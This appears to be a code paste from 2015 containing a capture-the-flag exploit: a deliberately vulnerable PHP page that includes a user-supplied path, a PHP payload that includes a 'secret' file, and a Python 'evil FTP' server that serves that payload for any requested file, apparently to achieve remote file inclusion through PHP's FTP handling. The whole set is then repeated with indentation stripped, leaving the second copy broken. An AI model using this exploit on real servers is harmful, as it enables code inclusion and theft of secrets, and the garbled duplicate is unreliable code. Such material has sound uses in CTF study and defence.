eur0pa · August 29, 2015 14:25
diff --git a/CTF.php b/CTF.php
 <?php
    ini_set('display_errors',1);
    ini_set('display_startup_errors',1);
    error_reporting(-1);

    $file = $_GET['x'].uniqid().uniqid();
    echo "$file = ";
    var_dump(file_exists($file));

    if(preg_match('/php|http|\?/', $_GET['x']))
    {
        die('forbidden char');
    }

    if (file_exists($file))
    {
        include $file;
    }
 ?>
diff --git a/evil.PHP b/evil.PHP
 <?php include('./secret'); ?>
diff --git a/evil_ftp.py b/evil_ftp.py
 #!/usr/bin/env python2
 # -*- coding: utf-8 -*-

 import os,socket,threading,time

 local_ip = socket.gethostbyname(socket.gethostname())
 local_port = 21
 currdir=os.path.abspath('.')
 evil_file = "/srv/http/tmp/evil.PHP" # <------------------- tweak this

 class FTPserverThread(threading.Thread):
    def __init__(self,(conn,addr)):
        self.conn=conn
        self.addr=addr
        self.basewd=currdir
        self.cwd=self.basewd
        self.rest=False
        self.pasv_mode=False
        threading.Thread.__init__(self)

    def run(self):
        self.conn.send('220 welcome to evil ftp :>\r\n')
        while True:
            cmd=self.conn.recv(256)
            if not cmd: break
            else:
                print 'got cmd:',cmd
                try:
                    func=getattr(self,cmd[:4].strip().upper())
                    func(cmd)
                except Exception,e:
                    print 'error:',e
                    self.conn.send('500 nope.\r\n')

    def USER(self,cmd):
        self.conn.send('331 OK.\r\n')

    def PASS(self,cmd):
        self.conn.send('230 OK.\r\n')

    def QUIT(self,cmd):
        self.conn.send('221 bye.\r\n')

    def TYPE(self,cmd):
        self.mode=cmd[5]
        self.conn.send('200 binary mode.\r\n')

    def SIZE(self,cmd):
        self.conn.send('200 1\r\n')

    def CWD(self,cmd):
        chwd=cmd[4:-2]
        if chwd=='/':
            self.cwd=self.basewd
        elif chwd[0]=='/':
            self.cwd=os.path.join(self.basewd,chwd[1:])
        else:
            self.cwd=os.path.join(self.cwd,chwd)
        self.conn.send('250 OK.\r\n')

    def PORT(self,cmd):
        if self.pasv_mode:
            self.servsock.close()
            self.pasv_mode = False
        l=cmd[5:].split(',')
        self.dataAddr='.'.join(l[:4])
        self.dataPort=(int(l[4])<<8)+int(l[5])
        self.conn.send('200 Get port.\r\n')

    def PASV(self,cmd): # from http://goo.gl/3if2U
        self.pasv_mode = True
        self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.servsock.bind((local_ip,0))
        self.servsock.listen(1)
        ip, port = self.servsock.getsockname()
        print 'open', ip, port
        self.conn.send('227 entering passive mode (%s,%u,%u).\r\n' %
                (','.join(ip.split('.')), port>>8&0xFF, port&0xFF))

    def start_datasock(self):
        if self.pasv_mode:
            self.datasock, addr = self.servsock.accept()
            print 'connect:', addr
        else:
            self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            self.datasock.connect((self.dataAddr,self.dataPort))

    def stop_datasock(self):
        self.datasock.close()
        if self.pasv_mode:
            self.servsock.close()

    def RETR(self,cmd):
        fn=os.path.join(self.cwd,evil_file) # <--------- evil black majic
        print 'hijacking file RETR:',fn
        if self.mode=='I':
            fi=open(fn,'rb')
        else:
            fi=open(fn,'r')
        self.conn.send('150 opening data connection.\r\n')
        if self.rest:
            fi.seek(self.pos)
            self.rest=False
        data= fi.read(1024)
        self.start_datasock()
        while data:
            self.datasock.send(data)
            data=fi.read(1024)
        fi.close()
        self.stop_datasock()
        self.conn.send('226 Transfer complete.\r\n')

 class FTPserver(threading.Thread):
    def __init__(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((local_ip,local_port))
        threading.Thread.__init__(self)

    def run(self):
        self.sock.listen(5)
        while True:
            th=FTPserverThread(self.sock.accept())
            th.daemon=True
            th.start()

    def stop(self):
        self.sock.close()

 if __name__=='__main__':
    ftp=FTPserver()
    ftp.daemon=True
    ftp.start()
    print 'evil ftp listening on ', local_ip, ':', local_port
    raw_input('enter to stop\n')
    ftp.stop()
	<?php
	ini_set('display_errors',1);
	ini_set('display_startup_errors',1);
	error_reporting(-1);

	$file = $_GET['x'].uniqid().uniqid();
	echo "$file = ";
	var_dump(file_exists($file));

	if(preg_match('/php\|http\|\?/', $_GET['x']))
	{
	die('forbidden char');
	}

	if (file_exists($file))
	{
	include $file;
	}
	?>
	#!/usr/bin/env python2
	# -- coding: utf-8 --

	import os,socket,threading,time

	local_ip = socket.gethostbyname(socket.gethostname())
	local_port = 21
	currdir=os.path.abspath('.')
	evil_file = "/srv/http/tmp/evil.PHP" # <------------------- tweak this

	class FTPserverThread(threading.Thread):
	def __init__(self,(conn,addr)):
	self.conn=conn
	self.addr=addr
	self.basewd=currdir
	self.cwd=self.basewd
	self.rest=False
	self.pasv_mode=False
	threading.Thread.__init__(self)

	def run(self):
	self.conn.send('220 welcome to evil ftp :>\r\n')
	while True:
	cmd=self.conn.recv(256)
	if not cmd: break
	else:
	print 'got cmd:',cmd
	try:
	func=getattr(self,cmd[:4].strip().upper())
	func(cmd)
	except Exception,e:
	print 'error:',e
	self.conn.send('500 nope.\r\n')

	def USER(self,cmd):
	self.conn.send('331 OK.\r\n')

	def PASS(self,cmd):
	self.conn.send('230 OK.\r\n')

	def QUIT(self,cmd):
	self.conn.send('221 bye.\r\n')

	def TYPE(self,cmd):
	self.mode=cmd[5]
	self.conn.send('200 binary mode.\r\n')

	def SIZE(self,cmd):
	self.conn.send('200 1\r\n')

	def CWD(self,cmd):
	chwd=cmd[4:-2]
	if chwd=='/':
	self.cwd=self.basewd
	elif chwd[0]=='/':
	self.cwd=os.path.join(self.basewd,chwd[1:])
	else:
	self.cwd=os.path.join(self.cwd,chwd)
	self.conn.send('250 OK.\r\n')

	def PORT(self,cmd):
	if self.pasv_mode:
	self.servsock.close()
	self.pasv_mode = False
	l=cmd[5:].split(',')
	self.dataAddr='.'.join(l[:4])
	self.dataPort=(int(l[4])<<8)+int(l[5])
	self.conn.send('200 Get port.\r\n')

	def PASV(self,cmd): # from http://goo.gl/3if2U
	self.pasv_mode = True
	self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	self.servsock.bind((local_ip,0))
	self.servsock.listen(1)
	ip, port = self.servsock.getsockname()
	print 'open', ip, port
	self.conn.send('227 entering passive mode (%s,%u,%u).\r\n' %
	(','.join(ip.split('.')), port>>8&0xFF, port&0xFF))

	def start_datasock(self):
	if self.pasv_mode:
	self.datasock, addr = self.servsock.accept()
	print 'connect:', addr
	else:
	self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	self.datasock.connect((self.dataAddr,self.dataPort))

	def stop_datasock(self):
	self.datasock.close()
	if self.pasv_mode:
	self.servsock.close()

	def RETR(self,cmd):
	fn=os.path.join(self.cwd,evil_file) # <--------- evil black majic
	print 'hijacking file RETR:',fn
	if self.mode=='I':
	fi=open(fn,'rb')
	else:
	fi=open(fn,'r')
	self.conn.send('150 opening data connection.\r\n')
	if self.rest:
	fi.seek(self.pos)
	self.rest=False
	data= fi.read(1024)
	self.start_datasock()
	while data:
	self.datasock.send(data)
	data=fi.read(1024)
	fi.close()
	self.stop_datasock()
	self.conn.send('226 Transfer complete.\r\n')

	class FTPserver(threading.Thread):
	def __init__(self):
	self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	self.sock.bind((local_ip,local_port))
	threading.Thread.__init__(self)

	def run(self):
	self.sock.listen(5)
	while True:
	th=FTPserverThread(self.sock.accept())
	th.daemon=True
	th.start()

	def stop(self):
	self.sock.close()

	if __name__=='__main__':
	ftp=FTPserver()
	ftp.daemon=True
	ftp.start()
	print 'evil ftp listening on ', local_ip, ':', local_port
	raw_input('enter to stop\n')
	ftp.stop()